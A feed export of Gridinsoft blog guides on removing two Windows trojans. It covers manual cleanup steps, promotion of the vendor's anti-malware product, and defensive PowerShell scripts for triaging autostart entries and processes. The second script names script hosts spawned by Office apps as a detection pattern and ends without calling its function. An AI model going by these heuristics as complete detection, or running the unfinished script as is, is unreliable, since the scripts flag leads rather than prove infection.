Windows – Gridinsoft Blog
https://gridinsoft.com/blogs
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Feed generated Wed, 09 Jul 2025 03:04:16 +0000

Trojan:Win32/Suschil!rfn – Easy Ways to Remove It
https://gridinsoft.com/blogs/trojan-win32-suschilrfn-virus-removal/
Published Wed, 09 Jul 2025 02:44:54 +0000
If your antivirus has flagged Trojan:Win32/Suschil!rfn, don’t panic. Your computer might be running slower than usual. You might notice strange processes consuming system resources. Your browser might be acting up with unexpected redirects or pop-ups.

This guide will help you remove the threat completely. Before you start, open the detection details in your antivirus (in Windows Security: Virus & threat protection ⇢ Protection history) and note the file path it reports; that path is the starting point for the manual steps below. We’ll begin with manual methods you can try right now.

Detection Name: Trojan:Win32/Suschil!rfn
Threat Type: Trojan Horse / Information Stealer
Threat Family: Suschil Trojan Family
Primary Function: Data theft, system compromise, backdoor access, credential harvesting
Target Platforms: Windows 7, Windows 8, Windows 10, Windows 11
Common Sources: Cracked software, email attachments, malicious downloads, drive-by downloads
File Locations: %TEMP%, %APPDATA%, %LOCALAPPDATA%, %SystemRoot%\System32
Registry Keys: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Network Behavior: Connects to command and control servers, downloads additional payloads
Data Targets: Passwords, browser data, cryptocurrency wallets, banking information
Persistence Methods: Registry entries, scheduled tasks, startup folder modifications
Removal Difficulty: Moderate to High – Requires comprehensive cleanup
Risk Level: High – Can steal personal data and provide unauthorized system access
Impact Level: Severe – Identity theft, financial loss, system compromise

What Is Trojan:Win32/Suschil!rfn?

Trojan:Win32/Suschil!rfn is a detection name in Microsoft Defender’s format (type: platform/family, followed by a suffix) for a trojan that targets Windows systems. It’s designed to steal your personal information. The malware can access your files, passwords, and browsing data.

[Screenshot: Trojan:Win32/Suschil!rfn virus detection]

This trojan often disguises itself as legitimate software. It might appear as a normal Windows process or application file. Once installed, it runs silently in the background.

The malware can open backdoors for hackers. This means criminals can access your computer remotely. They can install additional malware or steal sensitive data.

Similar to other trojan malware threats, Suschil!rfn uses social engineering tactics. It tricks users into downloading infected files. Common infection methods include cracked games, pirated software, and suspicious email attachments.

Signs Your Computer Is Infected

You might notice these symptoms if Trojan:Win32/Suschil!rfn has infected your system:

  • Slow system performance – Your computer takes longer to start up and respond
  • High CPU usage – Task Manager shows processes consuming excessive resources
  • Unusual network activity – Unexpected data transfers or network connections
  • Browser issues – Redirects to suspicious websites or unwanted pop-ups
  • Antivirus alerts – Repeated detections of the same threat
  • System crashes – Frequent blue screens or unexpected shutdowns
  • Missing files – Important documents or programs disappear

These symptoms are common across many information stealing malware infections. If you notice multiple symptoms, immediate action is required.

Manual Removal Steps

Manual removal requires careful attention to detail. Follow each step exactly as described. Make sure to complete all steps to ensure complete removal.

Step 1: Disconnect from the Internet

Your first priority is cutting off the malware’s communication. Disconnect your computer from the internet immediately. This prevents the trojan from sending stolen data to hackers.

Unplug your ethernet cable or disable your Wi-Fi connection. This also stops the malware from downloading additional threats.

  1. Click the network icon in your system tray
  2. Select “Disconnect” for your current connection
  3. Alternatively, unplug your ethernet cable

Step 2: Boot into Safe Mode

Safe Mode loads Windows with minimal drivers and services and skips most autostart entries, so the malware is usually not running while you work. This makes it easier to identify and remove malicious processes and files.

  1. Press Windows key + R to open the Run dialog
  2. Type “msconfig” and press Enter
  3. Go to the Boot tab
  4. Check “Safe boot” and select “Minimal”
  5. Click OK and restart your computer

Your computer will boot into Safe Mode. The desktop will look different than usual. This is normal.

Step 3: Identify Malicious Processes

Open Task Manager to check for suspicious processes. Look for processes that you don’t recognize or that consume high CPU resources.

  1. Press Ctrl + Shift + Esc to open Task Manager
  2. Click the “Processes” tab
  3. Look for processes with suspicious names or high resource usage
  4. Right-click suspicious processes and select “End task”
  5. Note the process names and file locations

Be careful not to end legitimate Windows processes. Process names are easy to fake, so judge by location rather than name: right-click the process, choose Open file location, and treat a Windows-named binary such as svchost.exe that lives outside C:\Windows\System32, or any process running from %TEMP% or %APPDATA%, as suspect. Properties ⇢ Digital Signatures shows whether the file is signed. If you’re still unsure, research the process and its path online before ending it.

Step 4: Delete Malicious Files

Now you need to locate and delete the actual malware files. Trojan:Win32/Suschil!rfn typically hides in these locations:

  1. Press Windows key + E to open File Explorer
  2. Enable “Show hidden files” in the View tab
  3. Navigate to these common malware locations:

Common file locations:

  • C:\Users\[username]\AppData\Local\Temp
  • C:\Users\[username]\AppData\Roaming
  • C:\Windows\Temp
  • C:\Windows\System32
  • C:\Program Files
  • C:\Program Files (x86)

Look for files with random names or recent modification dates, and in particular for the paths you noted in Step 3 and in the antivirus detection details. Delete only files you can tie to the infection: System32 and Program Files hold many legitimately odd-looking names, and removing the wrong file there can break Windows. Empty the Recycle Bin when finished.

Step 5: Clean Registry Entries

Trojans often modify Windows Registry to maintain persistence. You need to remove these entries manually.

  1. Press Windows key + R to open Run dialog
  2. Type “regedit” and press Enter
  3. Navigate to these registry locations:

Registry locations to check:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

Each value’s data is the command that runs at sign-in. Treat values that point into %TEMP%, %APPDATA% or %LOCALAPPDATA%, that point at a file which no longer exists, or that use a random-looking name as suspect. Record the full path before deleting the value, then delete the file it points to as well; removing only the registry entry leaves the executable in place.

Warning: Be extremely careful when editing the registry. Deleting wrong entries can damage your system. Only remove entries you’re certain are malicious.

Step 6: Check Scheduled Tasks

Malware often creates scheduled tasks to restart automatically. You need to find and remove these tasks.

  1. Press Windows key + R to open Run dialog
  2. Type “taskschd.msc” and press Enter
  3. Expand “Task Scheduler Library” in the left panel
  4. Look for tasks with suspicious names or unknown publishers
  5. Right-click suspicious tasks and select “Delete”

Pay attention to tasks that run at startup or sign-in, or that repeat every few minutes. The task name is easy to fake, so check the Actions tab for what actually runs: a program in %TEMP%, %APPDATA% or another user-writable folder, or a script host such as powershell.exe or wscript.exe with a long encoded argument, is the typical malware pattern.

Step 7: Clear Browser Data

Trojans often target browsers to steal saved login credentials, cookies and session tokens. Clearing browsing data removes cached traces, but it does not undo theft that has already happened: treat every password saved in the browser as compromised and change it from a clean device (see Change All Passwords below).

  1. Open each browser you use (Chrome, Firefox, Edge)
  2. Access browser settings
  3. Find “Clear browsing data” or “Privacy” settings
  4. Select all data types and clear everything
  5. Restart your browser

This process is similar to dealing with heuristic virus infections that target browser data.

Step 8: Reset System Settings

Return your system to normal boot mode and verify the infection is gone.

  1. Press Windows key + R to open Run dialog
  2. Type “msconfig” and press Enter
  3. Go to the Boot tab
  4. Uncheck “Safe boot”
  5. Click OK and restart your computer

After restart, reconnect to the internet and run a full system scan with your antivirus software. If the detection keeps returning, run a scan that starts before Windows loads (for example Windows Security ⇢ Virus & threat protection ⇢ Scan options ⇢ Microsoft Defender Offline scan), which can remove components that reload at boot.
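The manual sweep in Steps 3 through 6 can be done in one pass from PowerShell. The script below is an added example written for this guide, not code from Gridinsoft or from any analysis of this malware: it lists the Run/RunOnce values, Startup-folder items and non-Microsoft scheduled tasks, resolves what each one executes, and flags entries that launch from a user-writable directory, point at a missing file, or run a binary without a valid Authenticode signature. It assumes an elevated Windows PowerShell 5.1 (or later) prompt; the directory list and flag names are the example’s own choices.

```powershell
# Added example for this guide (not Gridinsoft product code): sweep the autostart
# locations that Steps 5 and 6 inspect by hand, plus the Startup folders, and flag
# entries that launch from user-writable directories, point at a missing file, or
# run a binary without a valid Authenticode signature. A flag means "look closer",
# not "malicious". Assumes an elevated Windows PowerShell 5.1 (or later) prompt.

$RunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)

# Directories a standard user can write to; legitimate autostarts rarely live here.
$UserWritable = @($env:TEMP, $env:APPDATA, $env:LOCALAPPDATA, $env:ProgramData,
                  "$env:SystemRoot\Temp", $env:PUBLIC) |
    Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\').ToLowerInvariant() }

# Extract the program from a command line: first quoted token or first whitespace-
# delimited token, with %VARS% expanded and bare names (e.g. "cmd") resolved via PATH.
function Get-ExecutablePath([string]$CommandLine) {
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) }
    }
    $token = ($cmd -split '\s+')[0]
    if ($token -notmatch '\\') {
        $found = Get-Command $token -CommandType Application -ErrorAction SilentlyContinue |
                 Select-Object -First 1
        if ($found) { return $found.Source }
    }
    return $token
}

function Test-Autostart([string]$Source, [string]$Name, [string]$CommandLine) {
    $exe    = Get-ExecutablePath $CommandLine
    $exists = [bool]($exe -and (Test-Path -LiteralPath $exe -PathType Leaf))
    $sig    = 'n/a'
    if ($exists) {
        $s = Get-AuthenticodeSignature -LiteralPath $exe -ErrorAction SilentlyContinue
        $sig = if ($s) { $s.Status.ToString() } else { 'Unreadable' }
    }
    $lower = if ($exe) { $exe.ToLowerInvariant() } else { '' }
    $flags = @()
    if (-not $exists) { $flags += 'missing-file' }
    if (@($UserWritable | Where-Object { $lower.StartsWith($_ + '\') }).Count -gt 0) { $flags += 'user-writable-dir' }
    if ($exists -and $sig -ne 'Valid') { $flags += "sig:$sig" }
    [pscustomobject]@{
        Source  = $Source
        Name    = $Name
        Path    = $exe
        Flags   = ($flags -join ',')
        Command = $CommandLine
    }
}

$results = @()

# 1. Registry Run / RunOnce values (value data = command executed at sign-in)
foreach ($key in $RunKeys) {
    if (-not (Test-Path $key)) { continue }
    foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($p.Name -in 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider') { continue }
        $results += Test-Autostart $key $p.Name ([string]$p.Value)
    }
}

# 2. Startup folders (per-user and all-users); resolve .lnk shortcuts to their target
$shell = New-Object -ComObject WScript.Shell
foreach ($dir in @([Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup'))) {
    foreach ($f in (Get-ChildItem -LiteralPath $dir -File -ErrorAction SilentlyContinue)) {
        $target = if ($f.Extension -eq '.lnk') { $shell.CreateShortcut($f.FullName).TargetPath } else { $f.FullName }
        $results += Test-Autostart "Startup:$dir" $f.Name "`"$target`""
    }
}

# 3. Scheduled tasks outside Microsoft's own folder (where most third-party persistence lands)
foreach ($t in (Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\*' })) {
    foreach ($a in $t.Actions) {
        if ($a.Execute) { $results += Test-Autostart "Task:$($t.TaskPath)" $t.TaskName "$($a.Execute) $($a.Arguments)" }
    }
}

# Flagged entries first; an empty Flags column means nothing obviously wrong.
$results | Sort-Object { $_.Flags -eq '' }, Source | Format-Table -AutoSize -Wrap
```

A flag is a reason to look, not proof of infection; plenty of legitimate updaters run unsigned from %LOCALAPPDATA%. An unquoted command whose path contains spaces splits at the first space and shows up as missing-file, which is itself worth a closer look. The script covers only the locations this guide discusses; services, Winlogon entries and WMI event subscriptions are common persistence points too, and Sysinternals Autoruns enumerates all of them.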

Automatic Removal with GridinSoft Anti-Malware

Manual removal can be complex and time-consuming. For a faster, more reliable solution, GridinSoft Anti-Malware offers automatic detection and removal of trojan threats. Professional anti-malware software can find hidden components and registry changes that you might miss.

GridinSoft Anti-Malware specializes in detecting sophisticated threats like Trojan:Win32/Suschil!rfn. The software uses advanced heuristic analysis to identify malware behavior patterns.

[Screenshot: GridinSoft Anti-Malware main screen]

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

[Screenshot: scan results screen]

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

[Screenshot: removal finished]

Browser Cleanup

Remove Malicious Browser Extensions

Trojans often install malicious browser extensions to monitor your online activities. These extensions can steal passwords and personal information.


Google Chrome

  1. Launch the Chrome browser.
  2. Click the "Customize and control Google Chrome" menu (three dots) ⇢ Extensions ⇢ Manage Extensions, or type chrome://extensions/ in the address bar.
  3. Click "Remove" next to the extension and confirm.

If you have an extension button on the browser toolbar, right-click it and select Remove from Chrome.

Mozilla Firefox

  1. Click the menu button, select Add-ons and Themes, and then click Extensions.
  2. Scroll through the extensions.
  3. Click on the … (three dots) icon for the extension you want to delete and select Delete.

Microsoft Edge

  1. Launch the Microsoft Edge browser.
  2. Click the three dots (…) menu in the top right corner.
  3. Select Extensions.
  4. Find the extension you want to remove and click Remove.
  5. Click Remove again to confirm.

Alternatively, you can type edge://extensions/ in the address bar to access the extensions page directly.

Opera

  1. Launch the Opera browser.
  2. Click the Opera menu button in the top left corner.
  3. Select Extensions ⇢ Manage extensions.
  4. Find the extension you want to remove and click the X button next to it.
  5. Click Remove to confirm.

Alternatively, you can type opera://extensions/ in the address bar to access the extensions page directly.

Reset Your Browser

If you suspect browser-based compromise, reset your browser completely. This removes all extensions, settings, and stored data.


Google Chrome

  1. Click the three-dot menu in the top right corner and choose Settings.
  2. Choose Reset settings (called Reset and clean up in older versions), then Restore settings to their original defaults.
  3. Click Reset settings to confirm.

Mozilla Firefox

  1. Click the three-line menu in the upper right corner and choose Help.
  2. Choose More troubleshooting information.
  3. Click Refresh Firefox…, then confirm with Refresh Firefox.

Microsoft Edge

  1. Click the three-dot menu in the top right corner.
  2. Choose Settings.
  3. Choose Reset settings, then click Restore settings to their default values and confirm.

Opera

  1. Launch the Opera browser.
  2. Click the Opera menu button in the top left corner and select Settings.
  3. Scroll down to the Advanced section in the left sidebar and click Reset and clean up.
  4. Click Restore settings to their original defaults.
  5. Click Reset settings to confirm.

Alternatively, you can type opera://settings/reset in the address bar to access reset options directly.

How to Prevent Future Infections

Prevention is always better than removal. Follow these security practices to protect your system from future trojan infections.

Avoid Suspicious Downloads

Never download software from untrusted sources. Stick to official websites and verified download platforms. Be especially careful with cracked games and pirated software, as these are common infection vectors.

Keep Your System Updated

Install Windows updates regularly. Security patches fix vulnerabilities that malware exploits. Enable automatic updates for critical security fixes.

Use Reliable Antivirus Software

Install reputable antivirus software with real-time protection. Keep virus definitions updated. Run regular system scans to catch threats early.

Be Cautious with Email Attachments

Never open attachments from unknown senders. Scan all attachments with antivirus software before opening. Be suspicious of unexpected attachments, even from known contacts.

Enable Windows Defender

Microsoft Defender (the built-in antivirus in Windows Security, formerly called Windows Defender) provides baseline protection against malware. Don’t disable it unless you have a compelling reason and alternative real-time protection in place.

Create System Backups

Regular backups protect your data if malware strikes. Use Windows Backup or third-party backup solutions. Store backups on external drives that are disconnected when not in use, or in cloud storage with file versioning, so that a stealer or a follow-on ransomware payload cannot reach them.

Frequently Asked Questions

What is Trojan:Win32/Suschil!rfn and why is it dangerous?

Trojan:Win32/Suschil!rfn is a malicious program that steals personal information and provides unauthorized access to your computer. It’s dangerous because it can steal passwords, financial data, and personal files. The trojan also creates backdoors for additional malware infections.

How did Trojan:Win32/Suschil!rfn get on my computer?

This trojan typically spreads through infected downloads, email attachments, or bundled software. Common sources include cracked software, pirated games, and suspicious email attachments. It might also come from visiting compromised websites or clicking malicious ads.

Can I remove Trojan:Win32/Suschil!rfn manually?

Yes, you can remove it manually by following the steps in this guide. However, manual removal requires technical knowledge and careful attention to detail. Missing any components can leave your system vulnerable. For complete removal, consider using professional anti-malware software.

Is it safe to delete processes related to Suschil!rfn?

Yes, it’s safe to delete malicious processes once you’ve identified them correctly. However, be careful not to end legitimate Windows processes. If you’re unsure about a process, research it online or use Task Manager’s “Properties” option to check file details.

How can I prevent Trojan:Win32/Suschil!rfn infections?

Avoid downloading software from untrusted sources, keep your system updated, use reliable antivirus software, and be cautious with email attachments. Regular system backups also help protect your data if infections occur.

What if manual removal doesn’t work?

If manual removal fails, the trojan might have deep system integration or rootkit capabilities. In such cases, professional anti-malware tools like GridinSoft Anti-Malware provide more comprehensive removal. These tools can detect hidden components that manual methods might miss.

Should I reinstall Windows after removing the trojan?

Complete Windows reinstallation isn’t strictly necessary if you’ve successfully removed all malware components. However, a trojan that gave an attacker remote access may have installed further tooling that no scan lists, so if the infection was severe or you cannot confirm what ran on the machine, a clean Windows installation is the only way to be sure; it provides the highest level of security assurance.

Can this trojan come back after removal?

The trojan can return if you don’t eliminate all components or if the infection source remains active. This is why it’s important to follow all removal steps completely. Installing reliable antivirus software and practicing safe computing habits prevents reinfection.

Related Threats

Trojan:Win32/Suschil!rfn belongs to a family of similar threats. Understanding related malware helps you recognize and prevent future infections.

Trojan:Win32/Kepavll!rfn is another variant that targets Windows systems. It uses similar infection methods and poses comparable threats to your personal data.

Trojan:Win32/Wacatac is a different, widely used generic detection name that covers a broad range of trojans, including ones that steal cryptocurrency. A single infection can trigger more than one of these names, so do not assume each alert is a separate piece of malware.

Trojan:Win32/Leonem is known for its persistence mechanisms. It’s particularly difficult to remove manually due to its deep system integration.

Other related threats include Trojan:Win32/Yomal!rfn and Trojan:Win32/Vundo. These trojans share similar characteristics and require similar removal approaches.

System Recovery Tips

After removing the trojan, your system might need additional recovery steps. These tips help restore normal functionality.

Check System Performance

Monitor your system performance after removal. The trojan might have damaged system files or changed critical settings. System File Checker repairs protected Windows files from the component store; it does not detect malware, so run it only after cleanup. If SFC reports files it could not repair, run DISM /Online /Cleanup-Image /RestoreHealth first and then SFC again:

  1. Open Command Prompt as administrator
  2. Type “sfc /scannow” and press Enter
  3. Wait for the scan to complete
  4. Restart your computer if prompted

Update All Software

Make sure all your software is up to date. Outdated programs can provide entry points for malware. Focus on these critical updates:

  • Windows operating system updates
  • Web browser updates
  • Antivirus software updates
  • Java runtime updates (Adobe Flash Player reached end of life in December 2020 and no longer receives patches: uninstall it rather than update it)
  • Microsoft Office updates

Change All Passwords

The trojan might have stolen your passwords. Change them after cleanup and, ideally, from a different device you trust, since a stealer that is still running captures the new ones too. Enable multi-factor authentication where the service offers it and sign out of all other sessions, because stolen session cookies can keep an attacker logged in after a password change. Change all important passwords, including:

  • Online banking and financial accounts
  • Email account passwords
  • Social media passwords
  • Shopping and e-commerce sites
  • Work-related accounts

Use strong, unique passwords for each account. Consider using a password manager to generate and store secure passwords.

Conclusion

Trojan:Win32/Suschil!rfn is a serious threat that requires immediate attention. This guide provides comprehensive manual removal steps and prevention strategies.

Remember that prevention is always better than removal. Practice safe computing habits, keep your system updated, and use reliable security software.

If manual removal seems too complex, don’t hesitate to use professional anti-malware tools. GridinSoft Anti-Malware provides automated detection and removal of threats like Suschil!rfn.

Stay vigilant and keep your system protected. Regular maintenance and security awareness are your best defenses against malware infections.

Quick Summary: Trojan:Win32/Suschil!rfn is a dangerous malware that steals personal information and provides unauthorized system access. Remove it by disconnecting from the internet, booting into Safe Mode, identifying malicious processes, deleting malware files, cleaning registry entries, and resetting browser settings. For easier removal, use GridinSoft Anti-Malware’s automated detection and removal capabilities.

How to Remove Trojan:Win32/Agent from Windows 11
https://gridinsoft.com/blogs/how-to-remove-trojanwin32-agent-virus/
Published Fri, 27 Jun 2025 03:29:44 +0000
If you’re seeing Trojan:Win32/Agent detected by your antivirus, don’t panic. Your computer might be running slower than usual. You may notice strange processes eating up your system resources. Files might be getting corrupted or deleted without your permission.

This guide will help you remove this threat completely. Follow these step-by-step instructions to eliminate Trojan:Win32/Agent from your system. We’ll start with manual methods you can try right now, then show you faster automatic solutions.

Detection Name: Trojan:Win32/Agent
Threat Type: Trojan Horse Malware
Affected Systems: Windows 7, 8, 8.1, 10, 11 (32-bit and 64-bit)
Primary Function: Steal personal information, download additional malware, create backdoors
Common Sources: Infected email attachments, malicious downloads, compromised websites
Typical File Locations: %AppData%, %Temp%, %ProgramData%, System32 folder
File Extensions: .exe, .dll, .scr, .bat, .com, .pif
Network Activity: Connects to remote servers, downloads payloads, sends stolen data
Persistence Methods: Registry entries, startup programs, scheduled tasks, system services
Detection Difficulty: Medium – Uses obfuscation and polymorphic techniques
Removal Difficulty: Medium – Multiple components and registry changes
Common Variants: Agent.AFB, Agent.BRK, Agent.EYA, Agent.PR, Agent.Gen
Risk Level: High – Can steal sensitive data and install other malware

What is Trojan:Win32/Agent?

Trojan:Win32/Agent is a sneaky piece of malware that hides inside what looks like normal software. Once it gets on your computer, it starts working in the background. You won’t see it running, but it’s busy stealing your information.

[Screenshot: Trojan:Win32/Agent virus detection on Windows 11]

This trojan can grab your passwords, banking details, and personal files. It might also download other dangerous software to your computer. The “Agent” name is actually used for many different variants of this malware family. You might see names like Trojan-Downloader:W32/Agent.BRK or Trojan-Dropper:W32/Agent.PR.

The malware is similar to other trojan malware we’ve analyzed. Like many modern threats, it tries to stay hidden while doing maximum damage to your system.

Signs Your Computer is Infected

You might notice these symptoms if Trojan:Win32/Agent is on your system:

  • Your computer runs much slower than before
  • Unknown processes appear in Task Manager
  • Files disappear or get corrupted
  • Pop-up ads appear even when browsers are closed
  • Your antivirus gets disabled or stops working
  • Network activity increases without explanation
  • New programs install themselves
  • Browser settings change without permission

These signs are common with information-stealing malware and similar threats. The sooner you act, the less damage the malware can do.

Manual Removal Steps

Manual removal takes time but gives you complete control. These steps will help you find and delete Trojan:Win32/Agent manually. Each step is important, so don’t skip any of them.

Step 1: Restart in Safe Mode

Safe Mode skips most autostart entries, so the malware is usually not running while you clean your system. This makes removal easier and safer.

  1. Press Windows + R keys together
  2. Type msconfig and press Enter
  3. Click the Boot tab
  4. Check Safe boot and select Minimal
  5. Click OK and restart your computer

Your computer will start in Safe Mode. The desktop will look different, but this is normal.

Step 2: End Malicious Processes

First, you need to stop the trojan from running. Open Task Manager to find suspicious processes.

  1. Press Ctrl + Shift + Esc to open Task Manager
  2. Click the Processes tab
  3. Look for processes with random names or high CPU usage
  4. Right-click suspicious processes and select End task
  5. Note down the process names and file locations

Common malicious process names are random strings of letters and numbers, or copy a Windows name (svchost.exe, explorer.exe) while running from the wrong folder. Right-click a process and choose Open file location; anything running from %TEMP%, %APPDATA% or another user-writable folder deserves a closer look. Be careful not to end important Windows processes. When in doubt, research the process name and its path online.

Step 3: Delete Malicious Files

Now you need to find and delete the actual malware files. Agent trojans commonly hide in these locations:

  1. Open File Explorer and navigate to C:\Users\[YourUsername]\AppData\Local\Temp
  2. Delete any recently created files with suspicious names
  3. Go to C:\Windows\Temp and delete suspicious files
  4. Check C:\ProgramData for folders with random names
  5. Look in C:\Users\[YourUsername]\AppData\Roaming for suspicious folders

Sort each folder by Date modified and pay attention to files created around the time your problems started, and to the paths you noted in Step 2 and in the antivirus detection details. C:\ProgramData and AppData hold many legitimate folders with random-looking or GUID names, so delete only what you can tie to the infection. Empty your Recycle Bin when done.

Step 4: Clean Registry Entries

The trojan creates registry entries to start automatically. You need to remove these entries to prevent reinfection.

  1. Press Windows + R and type regedit
  2. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  3. Look for entries with suspicious names or paths
  4. Right-click suspicious entries and select Delete
  5. Repeat for HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

Be very careful in the registry. Only delete entries you’re sure are malicious. Deleting the wrong entry can break your system.

Step 5: Check Startup Programs

Remove the malware from your startup programs list. This prevents it from running when Windows starts.

  1. Press Ctrl + Shift + Esc to open Task Manager
  2. Click the Startup tab
  3. Look for programs with suspicious names or publishers
  4. Right-click suspicious programs and select Disable
  5. Note down the program names for further investigation

Unknown programs or those from suspicious publishers should be disabled. You can always re-enable legitimate programs later.

Step 6: Clear Browser Data

Agent trojans often modify browser settings and install extensions. Clean your browsers to remove any traces.

Reset your browsers to default settings:


Google Chrome

  1. Click the three-dot menu in the top right corner and choose Settings.
  2. Choose Reset settings (called Reset and clean up in older versions), then Restore settings to their original defaults.
  3. Click Reset settings to confirm.

Mozilla Firefox

  1. Click the three-line menu in the upper right corner and choose Help.
  2. Choose More troubleshooting information.
  3. Click Refresh Firefox…, then confirm with Refresh Firefox.

Microsoft Edge

  1. Click the three-dot menu in the top right corner.
  2. Choose Settings.
  3. Choose Reset settings, then click Restore settings to their default values and confirm.

Opera

  1. Launch the Opera browser.
  2. Click the Opera menu button in the top left corner and select Settings.
  3. Scroll down to the Advanced section in the left sidebar and click Reset and clean up.
  4. Click Restore settings to their original defaults.
  5. Click Reset settings to confirm.

Alternatively, you can type opera://settings/reset in the address bar to access reset options directly.

Remove any suspicious browser extensions:


Google Chrome

  1. Launch the Chrome browser.
  2. Click the "Customize and control Google Chrome" menu (three dots) ⇢ Extensions ⇢ Manage Extensions, or type chrome://extensions/ in the address bar.
  3. Click "Remove" next to the extension.

If you have an extension button on the browser toolbar, right-click it and select Remove from Chrome.

Mozilla Firefox

  1. Click the menu button, select Add-ons and Themes, and then click Extensions.
  2. Scroll through the extensions.
  3. Click on the … (three dots) icon for the extension you want to delete and select Delete.

Microsoft Edge

  1. Launch the Microsoft Edge browser.
  2. Click the three dots (…) menu in the top right corner.
  3. Select Extensions.
  4. Find the extension you want to remove and click Remove.
  5. Click Remove again to confirm.

Alternatively, you can type edge://extensions/ in the address bar to access the extensions page directly.

Opera

  1. Launch the Opera browser.
  2. Click the Opera menu button in the top left corner.
  3. Select Extensions ⇢ Manage extensions.
  4. Find the extension you want to remove and click the X button next to it.
  5. Click Remove to confirm.

Alternatively, you can type opera://extensions/ in the address bar to access the extensions page directly.

Step 7: Restart Normally

Once you’ve completed all steps, restart your computer normally:

  1. Press Windows + R and type msconfig
  2. Uncheck Safe boot in the Boot tab
  3. Click OK and restart
  4. Run a full system scan with your antivirus

Monitor your system for any returning symptoms. If problems persist, the manual removal may have missed some components.
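Step 2 asks you to judge processes by name and CPU use, which is the weakest signal available. The script below is an added example written for this guide, not Gridinsoft’s tooling: it takes a snapshot of every process with its image path, Authenticode status, parent process and established connections to non-private addresses, and flags the combinations that matter for a trojan of this kind (a user-writable image path, an unsigned binary, a Windows system name running from the wrong folder, a script host spawned by an Office application, or an outbound connection). It assumes an elevated Windows PowerShell 5.1 (or later) prompt on a normally booted, still-online machine; the address ranges, name lists and flag labels are the example’s own choices.

```powershell
# Added example for this guide (not Gridinsoft product code): snapshot running
# processes with image path, signature status, parent process and outbound TCP
# connections, and flag the ones worth a closer look before you end them in Task
# Manager. Assumes an elevated Windows PowerShell 5.1 (or later) prompt, run while
# the machine is still online and booted normally: Safe Mode (Minimal) has no
# networking, so the Remote column will be empty there.

$UserWritable = @($env:TEMP, $env:APPDATA, $env:LOCALAPPDATA, $env:ProgramData,
                  "$env:SystemRoot\Temp", $env:PUBLIC) |
    Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\').ToLowerInvariant() }

# Loopback, link-local and RFC 1918 peers are not "talking out" for this purpose.
function Test-PrivateAddress([string]$Ip) {
    return [bool]($Ip -match '^(127\.|10\.|192\.168\.|169\.254\.|172\.(1[6-9]|2\d|3[01])\.|0\.0\.0\.0$|::1$|::$|fe80:)')
}

$procs = Get-CimInstance Win32_Process
$byPid = @{}
foreach ($p in $procs) { $byPid[[int]$p.ProcessId] = $p }

# Established connections grouped by owning PID, collected once up front.
$conns = @{}
foreach ($c in (Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue)) {
    if (-not (Test-PrivateAddress $c.RemoteAddress)) {
        $conns[[int]$c.OwningProcess] += @("$($c.RemoteAddress):$($c.RemotePort)")
    }
}

$sigCache = @{}
function Get-SigStatus([string]$Path) {
    if (-not $Path) { return 'no-path' }   # protected/system processes expose no path to WMI
    if (-not $sigCache.ContainsKey($Path)) {
        $s = Get-AuthenticodeSignature -LiteralPath $Path -ErrorAction SilentlyContinue
        $sigCache[$Path] = if ($s) { $s.Status.ToString() } else { 'Unreadable' }
    }
    return $sigCache[$Path]
}

function Get-ProcessTriage {
    foreach ($p in $procs) {
        $path   = $p.ExecutablePath
        $lower  = if ($path) { $path.ToLowerInvariant() } else { '' }
        $sig    = Get-SigStatus $path
        $parent = $byPid[[int]$p.ParentProcessId]
        $remote = $conns[[int]$p.ProcessId]
        $flags  = @()
        if (@($UserWritable | Where-Object { $lower.StartsWith($_ + '\') }).Count -gt 0) { $flags += 'user-writable-dir' }
        if ($path -and $sig -ne 'Valid') { $flags += "sig:$sig" }
        if ($remote) { $flags += 'external-connection' }
        # A system binary name running from outside %SystemRoot% is a common impersonation trick.
        if ($p.Name -match '^(svchost|csrss|lsass|winlogon|explorer)\.exe$' -and
            $path -and -not $lower.StartsWith($env:SystemRoot.ToLowerInvariant() + '\')) {
            $flags += 'system-name-wrong-path'
        }
        # A script host launched by an Office application is the classic malicious-attachment pattern.
        if ($parent -and $parent.Name -match '^(winword|excel|powerpnt|outlook)\.exe$' -and
            $p.Name -match '^(powershell|pwsh|wscript|cscript|mshta|cmd|rundll32|regsvr32)\.exe$') {
            $flags += "spawned-by:$($parent.Name)"
        }
        [pscustomobject]@{
            PID    = $p.ProcessId
            Name   = $p.Name
            Parent = if ($parent) { $parent.Name } else { '?' }
            Path   = $path
            Remote = ($remote -join ' ')
            Flags  = ($flags -join ',')
        }
    }
}

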